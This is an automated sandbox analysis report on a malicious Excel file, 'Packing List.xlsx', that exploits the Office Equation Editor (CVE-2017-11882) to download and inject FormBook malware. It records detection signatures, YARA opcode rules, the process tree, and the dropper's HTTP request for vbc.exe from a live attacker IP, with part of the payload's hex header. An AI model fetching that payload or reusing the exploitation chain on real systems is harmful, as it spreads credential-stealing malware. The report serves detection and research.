Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Packing List.xlsx

Overview

General Information

Sample Name:Packing List.xlsx
Analysis ID:510251
MD5:74c72f37e68bc3a8071467dd12bfaa7f
SHA1:5dd9599fde86870f52169a85cfb76020f504e43c
SHA256:de736eaf65c73f1aef5b09aa639d82e44129ac1300fd5411cab342e9e33faf7c
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Machine Learning detection for dropped file
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1292 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1532 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1836 cmdline: 'C:\Users\Public\vbc.exe' MD5: DF330AB2A2E5AA4AC947315EE3F93992)
      • vbc.exe (PID: 2228 cmdline: 'C:\Users\Public\vbc.exe' MD5: DF330AB2A2E5AA4AC947315EE3F93992)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000000.476970202.00000000001C0000.00000040.00000001.sdmpMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
  • 0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
00000006.00000000.476210300.00000000001C0000.00000040.00000001.sdmpMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
  • 0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
00000006.00000000.475402924.00000000001C0000.00000040.00000001.sdmpMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
  • 0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
00000006.00000000.482711816.00000000001C0000.00000040.00000001.sdmpMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
  • 0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    Click to see the 9 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    6.0.vbc.exe.1c0000.9.unpackMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
    • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
    • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
    • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
    6.0.vbc.exe.1c0000.11.raw.unpackMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
    • 0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
    • 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
    • 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
    6.0.vbc.exe.1c0000.13.unpackMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
    • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
    • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
    • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
    6.0.vbc.exe.1c0000.15.unpackMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
    • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
    • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
    • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
    6.0.vbc.exe.1c0000.7.unpackMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
    • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
    • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
    • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
    Click to see the 19 entries

    Sigma Overview

    Exploits:

    barindex
    Sigma detected: EQNEDT32.EXE connecting to internetShow sources
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.227.228.38, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1532, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
    Sigma detected: File Dropped By EQNEDT32EXEShow sources
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1532, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

    System Summary:

    barindex
    Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1532, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1836
    Sigma detected: Execution from Suspicious FolderShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1532, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1836

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: Packing List.xlsxVirustotal: Detection: 32%Perma Link
    Source: Packing List.xlsxReversingLabs: Detection: 29%
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORY
    Machine Learning detection for dropped fileShow sources
    Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected
    Source: 6.0.vbc.exe.1c0000.13.unpackAvira: Label: W32/Delf.I
    Source: 6.0.vbc.exe.1c0000.15.unpackAvira: Label: W32/Delf.I
    Source: 6.0.vbc.exe.1c0000.7.unpackAvira: Label: W32/Delf.I
    Source: 6.0.vbc.exe.1c0000.9.unpackAvira: Label: W32/Delf.I
    Source: 6.0.vbc.exe.1c0000.21.unpackAvira: Label: W32/Delf.I
    Source: 6.2.vbc.exe.1c0000.0.unpackAvira: Label: TR/ATRAPS.Gen
    Source: 6.0.vbc.exe.1c0000.5.unpackAvira: Label: W32/Delf.I
    Source: 6.0.vbc.exe.1c0000.23.unpackAvira: Label: W32/Delf.I
    Source: 6.0.vbc.exe.1c0000.17.unpackAvira: Label: W32/Delf.I
    Source: 6.0.vbc.exe.1c0000.11.unpackAvira: Label: W32/Delf.I
    Source: 6.0.vbc.exe.1c0000.25.unpackAvira: Label: W32/Delf.I
    Source: 6.0.vbc.exe.1c0000.19.unpackAvira: Label: W32/Delf.I
    Source: 5.2.vbc.exe.30b0000.5.unpackAvira: Label: W32/Delf.I

    Exploits:

    barindex
    Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: wntdll.pdb source: vbc.exe, 00000005.00000003.474355640.000000000F300000.00000004.00000001.sdmp
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00405E93 FindFirstFileA,FindClose,
    Source: C:\Users\Public\vbc.exeCode function: 5_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00402671 FindFirstFileA,
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00402671 FindFirstFileA,
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00405E93 FindFirstFileA,FindClose,
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.227.228.38:80
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.227.228.38:80
    Source: excel.exeMemory has grown: Private usage: 4MB later: 47MB
    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 28 Oct 2021 11:38:05 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11Last-Modified: Wed, 27 Oct 2021 06:07:30 GMTETag: "39809-5cf4f68c9b908"Accept-Ranges: bytesContent-Length: 235529Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 30 28 81 e9 51 46 d2 e9 51 46 d2 e9 51 46 d2 2a 5e 19 d2 eb 51 46 d2 e9 51 47 d2 71 51 46 d2 2a 5e 1b d2 e6 51 46 d2 bd 72 76 d2 e3 51 46 d2 2e 57 40 d2 e8 51 46 d2 52 69 63 68 e9 51 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 65 3a ff 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d6 01 00 00 04 00 00 fb 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 74 00 00 a0 00 00 00 00 d0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 eb 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 96 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 b0 01 00 00 90 00 00 00 06 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 d0 02 00 00 0a 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: global trafficHTTP traffic detected: GET /0078/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.227.228.38Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.38
    Source: vbc.exe, vbc.exe, 00000006.00000000.474777707.0000000000409000.00000008.00020000.sdmp, vbc.exe.3.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
    Source: vbc.exe, 00000005.00000000.468788902.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000006.00000000.474777707.0000000000409000.00000008.00020000.sdmp, vbc.exe.3.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: vbc.exe, 00000005.00000002.488324538.00000000021E0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: vbc.exe, 00000005.00000002.488324538.00000000021E0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\27DB9FE4.emfJump to behavior
    Source: global trafficHTTP traffic detected: GET /0078/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.227.228.38Connection: Keep-Alive
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

    E-Banking Fraud:

    barindex
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORY

    System Summary:

    barindex
    Malicious sample detected (through community Yara rule)Show sources
    Source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Office equation editor drops PE fileShow sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: 6.0.vbc.exe.1c0000.9.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 6.0.vbc.exe.1c0000.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 6.0.vbc.exe.1c0000.13.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 6.0.vbc.exe.1c0000.15.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 6.0.vbc.exe.1c0000.7.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 6.0.vbc.exe.1c0000.23.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 6.0.vbc.exe.1c0000.17.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 6.0.vbc.exe.1c0000.21.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 6.0.vbc.exe.1c0000.13.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 6.0.vbc.exe.1c0000.25.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 6.2.vbc.exe.1c0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 6.0.vbc.exe.1c0000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
